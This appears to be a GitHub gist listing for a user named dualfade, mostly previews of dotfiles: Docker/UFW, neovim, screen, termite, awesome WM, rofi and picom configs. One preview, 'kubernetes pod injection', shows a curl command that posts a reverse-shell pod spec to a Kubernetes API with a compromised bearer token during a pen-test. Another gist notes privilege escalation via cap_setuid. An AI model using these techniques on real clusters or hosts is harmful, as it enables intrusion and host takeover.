dualfade

View docker ufw --
BlackArch / ArchLinux Latest --
Docker UFW issues --
docker.json update --
% cat /etc/docker/daemon.json
{
"iptables": false
}
ufw default fwd policy update --
View neovim-init.vim blackarch --
# spacevim pissing me off --
# moving to neovim-init / blackarch --
# orig --
# https://github.com/Optixal/neovim-init.vim
# refs --
# https://github.com/neoclide/coc.nvim
# https://github.com/VundleVim/Vundle.vim
Note:
View kubernetes pod injection --
Post request to cluster --
Most articles talked about using "default" as the namespace;
this target needed a very specific namespace to be used because of the token and privileges.
% curl -sk -v -H 'Authorization: Bearer eyJhbHbiOiJSUzI1NiIsImtpZCI6InpR[full_jwt]4bGRe83bt6f_jPs1RXMKt3RnQd5ugveZfw' 'https://poc.somehackeddomain.com:6443/api/v1/namespaces/HACKED_NAMESPACE/pods' -H 'Content-Type: application/json' -d @5h3ll3x.json
yaml pod template --
Convert to json for proper injection --
Obviously you have to have enough privileges to use hostPath --
This particular pen-test aws was breached compromising the kube-system jwt and then the json reverse shell was
View dot screenrc
# GNU Screen - main configuration file
# Allow bold colors - necessary for some reason
attrcolor b ".I"
# Tell screen how to set colors. AB = background, AF=foreground
termcapinfo xterm 'Co#256:AB=\E[48;5;%dm:AF=\E[38;5;%dm'
# Enables use of shift-PgUp and shift-PgDn
termcapinfo xterm|xterms|xs|rxvt ti@:te@
View termite config --
# ~/.config/termite/config
[options]
allow_bold = true
font = Hack Nerd Font 8
icon_name = termite
scrollback_lines = 10000
[colors]
foreground = #c0c5ce
View Caps --
file with cap_setuid+ep ??
user with perms to make it so == root
Just some notes --
[user@lemur tmp]$ hostname ; id
lemur
uid=1001(user) gid=1001(user) groups=1001(user)
[user@lemur tmp]$ sudo -l
Matching Defaults entries for user on this host:
View blackarch awesome rofi
Disable std modkey r --
enable rofi --
-- Prompt
-- awful.key({ modkey }, "r", function () mypromptbox[mouse.screen.index]:run() end),
-- Run program (d for dmenu ;)
awful.key({ modkey }, "d",
function()
awful.spawn.with_shell("rofi -matching fuzzy -show combi")
View gist:f7f7e9ed7389ae2e9152042fb73c63c1
# ~/.config/termite/config
[options]
allow_bold = true
clickable_url = true
font = Hack Nerd Font 8
geometry = 700x520
icon_name = terminal
scrollback_lines = 10000
browser = lynx
View gist:029b6f7e217505fb1fcc9a32b864b365
% cat /etc/xdg/awesome/rc.lua
----- snip ------
-- autorun
-- https://wiki.archlinux.org/index.php/Awesome#Autostart
awful.spawn.with_shell("/etc/xdg/awesome/autorun.sh")
% cat /etc/xdg/awesome/autorun.sh
#!/usr/bin/env bash
function run {
View gist:e723816f1175c5ff364550d7cd6d0fce
picom --config ~/.config/picom/picom.conf
taken from --
https://gist.github.com/netzverweigerer/dbac005f86baf04edfea1f7e15e44cb5
Amazing job !! Kudos. Saved me a ton of time. Works perfectly with terminator and termite transparency ;) multi monitor --
# Shadow
shadow = true;
shadow-radius = 7;